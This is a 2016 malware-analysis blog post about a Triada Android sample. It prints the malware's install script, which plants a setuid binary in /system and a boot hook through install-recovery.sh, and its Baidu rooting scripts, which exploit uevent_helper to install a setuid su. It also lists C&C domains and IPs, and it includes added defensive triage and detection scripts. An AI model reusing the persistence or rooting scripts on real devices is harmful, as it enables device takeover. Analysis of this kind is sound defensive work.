Tuesday, March 22, 2016

Triada malware: hitting the android core system (part II)

Following my previous post, I took a look at another sample from the same malware family.

This second sample was reported the same day I performed the analysis, and it shows quite significant differences, with some very interesting points.

The first difference is that the malicious code is inside an application which shows up in the list of installed applications, unlike the previous one, which was 'hidden'. Moreover, the size of the APK is significantly bigger (1.5MB vs 100KB).

The application has a strange name, anefjlb.cdioclg.nfffpjj.jidondl.gkibaap.lmkgcmk, and it requests a large number of permissions compared to the sample analysed in the previous post:


    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="droid.permission.INSTALL_PACKAGES" />
    <uses-permission android:name="android.permission.CLEAR_APP_CACHE" />
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <permission android:name="android.permission.ACCESS_DOWNLOAD_MANAGER" />
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT" />
    <uses-permission android:name="com.android.launcher.permission.UNINSTALL_SHORTCUT" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.intent.action.BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <permission android:name="android.permission.BAIDU_LOCATION_SERVICE" />
    <uses-permission android:name="android.permission.BAIDU_LOCATION_SERVICE" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_MOCK_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_GPS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.SYSTEM_OVERLAY_WINDOW" />
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD" />
    <uses-permission android:name="READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_MMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.GET_PACKAGE_SIZE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.RESTART_PACKAGES" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.READ_LOGS" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.ACCESS_MTK_MMHW" />
    <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />
    <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.MOUT_UNMOUNT_FILESYSTEMS" />
    <uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.WRITE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.BROADCAST_STICKY" />
    <uses-permission android:name="com.android.alarm.permission.SET_ALARM" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
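A quick way to triage a permission list like the one above, as an added example (not code from the original post): dedupe the requests and separate names in a real permission namespace from ones Android will never grant, such as the bare READ_PHONE_STATE, the intent action android.intent.action.BOOT_COMPLETED, or the mangled droid.permission.INSTALL_PACKAGES. The manifest path is an assumption; the functions take a decoded AndroidManifest.xml as produced by apktool.

```shell
#!/bin/sh
# Added example, not code from the original post: triage the <uses-permission>
# list of a decoded AndroidManifest.xml (apktool output). The manifest path is
# an assumption; the test feeds it a constructed file using lines from above.

# list_permissions MANIFEST -> every requested permission name, one per line,
# duplicates included (the sample above repeats INTERNET several times).
list_permissions() {
    sed -n 's/.*<uses-permission[^>]*android:name="\([^"]*\)".*/\1/p' "$1"
}

# classify NAME -> "ok" for a name in a real permission namespace, "bogus" for
# a request Android silently ignores: a bare READ_PHONE_STATE, an intent action
# (android.intent.action.BOOT_COMPLETED) or a mangled namespace such as
# droid.permission.INSTALL_PACKAGES. Only the namespace is checked, so a typo
# inside the name (MOUT_UNMOUNT_FILESYSTEMS) still passes; diff the list
# against the platform's own permissions to catch those.
classify() {
    case "$1" in
        android.permission.[A-Z]*)       echo ok ;;
        com.android.*.permission.[A-Z]*) echo ok ;;
        *)                               echo bogus ;;
    esac
}

# count_bogus MANIFEST -> number of distinct names that will never be granted.
count_bogus() {
    n=0
    for p in $(list_permissions "$1" | sort -u); do
        if [ "$(classify "$p")" = bogus ]; then n=$((n + 1)); fi
    done
    echo "$n"
}

# report MANIFEST -> distinct names with request counts and classification.
# Many repeats of the same line usually mean several SDK manifest fragments
# were merged blindly, a useful triage signal on its own.
report() {
    list_permissions "$1" | sort | uniq -c | while read -r count name; do
        printf '%3d %-6s %s\n' "$count" "$(classify "$name")" "$name"
    done
}

if [ $# -gt 0 ]; then
    report "$1"
    echo "bogus permissions: $(count_bogus "$1")"
fi
```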

But the interesting part comes when analysing the behaviour of the malicious APK.
I managed to capture some of the temporary files used by the application to become persistent on the system. There are several binaries and scripts:


busybox:             gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
cd:                  very short file (no magic)
configopb:           ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), stripped
core:                Zip archive data, at least v2.0 to extract
install:             a /system/bin/sh script text executable
install-recovery.sh: a /system/bin/sh script text executable
librgsdk.so:         ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
mksh:                gzip compressed data, from Unix, last modified: Tue Dec 10 09:34:32 2013
recovery:            gzip compressed data, was "install-recovery.sh", from Unix, last modified: Wed Jun 11 11:59:16 2014
sr:                  data

One of the files is Busybox, which provides many Linux/Unix tools in a single binary. Really interesting :)

The install script contains the following set of commands:


#!/system/bin/sh
/system/bin/mount -o remount,rw /system
mount -o remount,rw /system
chmod 777 /system/etc
rm -f /system/etc/install-recovery.sh
cat /data/local/tmp/install-recovery.sh > /system/etc/install-recovery.sh
chown 0.0 /system/etc/install-recovery.sh
chown 0:0 /system/etc/install-recovery.sh
chmod 0755 /system/etc/install-recovery.sh
chmod 755 /system/etc
chmod 777 /system/bin
rm -f /system/bin/conbb
cat /data/local/tmp/configopb > /system/bin/conbb
chown 0.0 /system/bin/conbb
chown 0:0 /system/bin/conbb
chmod 6755 /system/bin/conbb
chmod 755 /system/bin
chmod 777 /system/xbin
rm -f /system/xbin/conbb
cat /data/local/tmp/configopb > /system/xbin/conbb
chown 0.0 /system/xbin/conbb
chown 0:0 /system/xbin/conbb
chmod 6755 /system/xbin/conbb
chmod 755 /system/xbin
mount -o remount,ro /system
/system/xbin/conbb ac32dorbdq

Basically, the script remounts /system read-write in order to copy the script install-recovery.sh into /system/etc and the configopb binary into /system/bin and /system/xbin under the name conbb, with the setuid bit set (chmod 6755), before remounting /system read-only again and launching /system/xbin/conbb. This is done to keep them persistently in the filesystem: /system/etc/install-recovery.sh is executed by init at boot, so whatever it launches survives a reboot.

The install-recovery.sh script contains the following:


#!/system/bin/sh
/system/xbin/conbb ac32dorbdq &
/system/bin/configopb ac32dorbdq &
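A defender-side check for the persistence mechanism described above, as an added example (not code from the original post or the malware): it looks for the conbb/configopb binaries with the setuid bit, for an install-recovery.sh that launches them, and for the staging copies in /data/local/tmp. ROOT defaults to / for running on the device and can point at an extracted /system image instead; the script name and the ROOT argument are assumptions.

```shell
#!/bin/sh
# Added example, not code from the original post: look for the persistence
# artifacts that the install script shown above leaves behind. ROOT defaults
# to / (push it and run: sh /data/local/tmp/check.sh) or names an extracted
# /system image; only ls, grep and test are used (BusyBox or toybox suffice).
# setuid_bit FILE -> returns 0 when the owner-execute column of ls -l shows
# 's' or 'S', i.e. the setuid bit that the installer sets with chmod 6755.
setuid_bit() {
    perm=$(ls -l "$1" | cut -c1-10)
    case "$perm" in
        ???[sS]*) return 0 ;;
        *)        return 1 ;;
    esac
}
# check_triada_persistence ROOT -> prints one line per finding; returns 1 if
# anything was found and 0 when the tree looks clean.
check_triada_persistence() {
    root=${1:-/}
    found=0
    # 1. The dropped helper: configopb is written as conbb into both
    #    /system/bin and /system/xbin; the Baidu rooter also drops xbin/su.
    for f in "$root/system/bin/conbb" "$root/system/xbin/conbb" \
             "$root/system/bin/configopb" "$root/system/xbin/su"; do
        if [ -f "$f" ]; then
            if setuid_bit "$f"; then
                echo "FOUND setuid binary: ${f#$root}"
            else
                echo "FOUND binary: ${f#$root}"
            fi
            found=1
        fi
    done
    # 2. /system/etc/install-recovery.sh is started by init at every boot,
    #    so a copy that launches conbb/configopb is the reboot-proof hook.
    ir="$root/system/etc/install-recovery.sh"
    if [ -f "$ir" ] && grep -Eq 'conbb|configopb' "$ir"; then
        echo "FOUND boot hook in /system/etc/install-recovery.sh:"
        grep -En 'conbb|configopb' "$ir"
        found=1
    fi
    # 3. Staging copies left behind in the dropper's working directory.
    for f in install install-recovery.sh configopb busybox mksh core sr; do
        if [ -e "$root/data/local/tmp/$f" ]; then
            echo "FOUND staged file: /data/local/tmp/$f"
            found=1
        fi
    done
    return $found
}
check_triada_persistence "${1:-/}"
```

On a clean device the script prints nothing and exits 0; any finding is printed and the exit status becomes 1, which makes it easy to loop over a fleet with adb.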


The file 'mksh' is a compressed archive which contains a set of scripts that reference an APK named com.baidu.easyroot, which is a rooting application. The content of the scripts is the following:


cat baiduscript-1

#!/system/bin/sh
'set' '-e';'exec' >>'/data/data/com.baidu.easyroot/files/mksh/baiduscript-4' 2>&'1';PATH='/system/bin';'mv' '/data/property' '/data/property.1384944281';'set' '+e';('set' '-e';'mkdir' '/data/property';'set' '+e';('set' '-e';'ln' '-s' '/sys/kernel/uevent_helper' '/data/property/.temp';'setprop' 'persist.sys.impactor' '/data/data/com.baidu.easyroot/files/mksh/baiduscript-2';
    if ! rm /data/property/persist.sys.impactor 2>/dev/null; then
        sleep 1
        rm /data/property/persist.sys.impactor
    fi;'ln' '-s' '/sys/bus/hid/uevent' '/data/property/.temp';'setprop' 'persist.sys.impactor' 'add';
    if ! rm /data/property/persist.sys.impactor 2>/dev/null; then
        sleep 1
        rm /data/property/persist.sys.impactor
    fi);e=$?;'rm' '-r' '/data/property';'set' '-e';(exit $e));e=$?;'mv' '/data/property.1384944281' '/data/property';'set' '-e';(exit $e)



cat baiduscript-2

#!/system/bin/sh
'set' '-e';'exec' >>'/data/data/com.baidu.easyroot/files/mksh/baiduscript-4' 2>&'1';PATH='/system/bin';'echo' '' >'/sys/kernel/uevent_helper';'set' '+e';('set' '-e');e=$?;'echo' >'/data/data/com.baidu.easyroot/files/mksh/baiduscript-5';'set' '-e';(exit $e);'/data/data/com.baidu.easyroot/files/mksh/baiduscript-3'




cat baiduscript-3

#!/system/bin/sh
'set' '-e';'exec' >>'/data/data/com.baidu.easyroot/files/mksh/baiduscript-4' 2>&'1';PATH='/system/bin';'mount' '-o' 'remount,rw' '' '/system';'set' '+e';('set' '-e';'set' '+e';('set' '-e');e=$?;'mkdir' '/system/xbin' 2>'/dev/null';'set' '-e';(exit $e);'cat' '/data/data/com.baidu.easyroot/files/su' >'/system/xbin/su';'chmod' '6755' '/system/xbin/su';'chmod' '6755' '/system/app/BaiduRoot.apk');e=$?;'mount' '-o' 'remount,ro' '' '/system' 2>'/dev/null';'set' '-e';(exit $e);'set' '+e';('set' '-e');e=$?;'echo' >'/data/data/com.baidu.easyroot/files/mksh/baiduscript-6';'set' '-e';(exit $e)


The last interesting file 'core' is an APK already reported in VirusTotal. 

The mentioned APK is almost the same as b2c2f74772c5057451668f144191f8d7191e5f98dbc6b6533698af5aa2baabc8, which is the one I analysed in my previous post.


In terms of traffic, the behaviour is very similar to the previous sample. There are several connections to different C&C hosts:

ph3.elsyzsmc.com:8080, cr3.rurimeter.com:8080, ph1.rurimeter.com:8080, ph2.elsyzsmc.com:8080, ph1.elsyzsmc.com:8080. Those domains resolve to the following IPs:

ph3.elsyzsmc.com 103.15.217.165
ph1.rurimeter.com 103.15.217.165
ph2.elsyzsmc.com 103.15.217.165
ph1.elsyzsmc.com 103.15.217.165
cr3.rurimeter.com 103.6.223.226

Note that the host 103.6.223.226 is also linked to ph3.xiaoyisy.com and ph4.xiaoyisy.com, which were used by the sample b2c2f74772c5057451668f144191f8d7191e5f98dbc6b6533698af5aa2baabc8.

Moreover, some additional modules are downloaded from xla.poticlas.com, which is exactly the same host used by sample b2c2f74772c5057451668f144191f8d7191e5f98dbc6b6533698af5aa2baabc8.

This time the modules pulled are different:


MD5 (2020.zip) = 42d6f191f1d7daf1e6204aa5823ef563
MD5 (2027.zip) = 31465b67f57efe3930dd9ebb7da3bc88
MD5 (2030.zip) = b1fccf033a589adf862d9c3b339f8efc
MD5 (2031.zip) = 25d93aba3e276ebd802814a3cd1aa735
MD5 (2044.zip) = b69876c4925e19d418564a5ec74f8554



In summary, the points to highlight from this sample are: its root capabilities, obtained through a set of scripts and a rooting APK; its ability to use / install additional tools like Busybox, which provides additional Linux / Unix functionality; and the way it becomes persistent on the system, remounting the filesystem in order to copy scripts and binaries into /system, which makes it very difficult to clean up.
The communication with the C&C and the installation of additional modules are similar to sample b2c2f74772c5057451668f144191f8d7191e5f98dbc6b6533698af5aa2baabc8 from the same malware family.